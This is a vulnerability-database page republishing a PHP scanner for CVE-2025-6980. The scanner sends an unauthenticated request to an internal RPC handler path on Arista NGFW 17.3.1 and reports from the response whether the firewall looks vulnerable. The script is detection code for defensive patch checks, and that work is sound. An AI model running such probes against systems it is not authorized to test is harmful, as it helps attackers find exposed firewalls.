Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ Arista NGFW 17.3.1 Information Disclosure Scanner

๐Ÿ—“๏ธย 10 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 120ย Views

Arista NGFW 17.3.1 information disclosure allows remote unauthenticated access to RPC handler.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-6980
4 Dec 202523:31
โ€“githubexploit
Arista		Security Advisory 0123
21 Oct 202500:00
โ€“arista
Circl		CVE-2025-6980
25 Nov 202505:00
โ€“circl
CNNVD		Arista Edge Threat Management - Arista Next Generation Firewall Versions ๅฎ‰ๅ…จๆผๆดž
23 Oct 202500:00
โ€“cnnvd
CVE		CVE-2025-6980
23 Oct 202518:41
โ€“cve
Cvelist		CVE-2025-6980 Captive Portal can expose sensitive information
23 Oct 202518:41
โ€“cvelist
EUVD		EUVD-2025-35727
23 Oct 202521:31
โ€“euvd
NVD		CVE-2025-6980
23 Oct 202519:15
โ€“nvd
Positive Technologies		PT-2025-43547
23 Oct 202500:00
โ€“ptsecurity
RedhatCVE		CVE-2025-6980
24 Oct 202519:26
โ€“redhatcve
Rows per page
=============================================================================================================================================
    | # Title     : Arista NGFW 17.3.1 Information Disclosure Scanner                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://edge.arista.com/ng-firewall/                                                                                        |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212504/ 
    
    [+] Summary :  The vulnerability allows remote unauthenticated connections to access the internal RPC handler component via:
                  /capture/handler.py/load_rpc_manager
                   This script PASSIVELY tests Arista NGFW systems for vulnerability. 
    
    [+]  Usage :   * : Save as: poc.php
                       Run    : php scan.php http[s]://TARGET
    
    Detection Logic:
    ----------------
    500 + โ€œMod_python errorโ€  โ†’ Vulnerable
    404 + <body class="loginPage"> โ†’ Not Vulnerable
    Other โ†’ Not Arista NGFW
    
    Output:
    -------
    [!] Target appears VULNERABLE
    [+] Target is not affected
    [?] Not Arista NGFW (or protected)
    [+]  POC :	
    
    <?php
    
    
    if ($argc < 2) {
        echo "Usage: php scan.php http[s]://TARGET\n";
        exit;
    }
    
    $target = trim($argv[1]);
    
    // Validate URL format
    if (!preg_match("#^https?://#i", $target)) {
        echo "[-] Invalid URL. Must start with http:// or https://\n";
        exit;
    }
    
    $url = rtrim($target, "/") . "/capture/handler.py/load_rpc_manager";
    
    echo "[*] Testing $target\n";
    
    // HTTP Request Options
    $options = [
        "http" => [
            "method"  => "GET",
            "header"  => "User-Agent: Mozilla/5.0\r\n",
            "timeout" => 15
        ],
        "ssl" => [
            "verify_peer"      => false,
            "verify_peer_name" => false
        ]
    ];
    
    $context = stream_context_create($options);
    
    $result = @file_get_contents($url, false, $context);
    
    if ($result === false) {
        echo "[-] Request failed or target unreachable\n";
        exit;
    }
    
    // Extract response headers
    $headers = isset($http_response_header) ? implode("\n", $http_response_header) : "";
    
    // Detection Logic
    if (strpos($result, "Mod_python error") !== false && strpos($headers, "500") !== false) {
        echo "[!] Target appears VULNERABLE to CVE-2025-6980 - Patch immediately!\n";
    } elseif (strpos($headers, "404") !== false && strpos($result, '<body class="loginPage">') !== false) {
        echo "[+] Target does NOT appear affected.\n";
    } else {
        echo "[?] Target does not behave like Arista NGFW or is protected.\n";
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Dec 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.17.5
EPSS0.00053
SSVC
Arista NGFWinformation disclosureremote accessunauthenticated accessinternal handlerremote procedure call
120